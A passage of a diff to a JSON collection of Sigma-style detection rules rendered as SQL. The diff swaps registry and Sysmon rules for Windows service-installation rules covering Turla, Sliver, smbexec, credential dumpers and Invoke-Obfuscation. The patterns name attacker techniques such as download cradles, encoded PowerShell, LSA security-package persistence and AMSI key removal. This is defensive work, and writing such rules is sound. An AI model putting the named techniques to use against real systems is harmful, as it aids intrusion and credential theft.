'%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 
'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR 
Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects 
various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE 
'\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. 
Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon 
scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') 
AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' 
AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of 
process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to 
open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 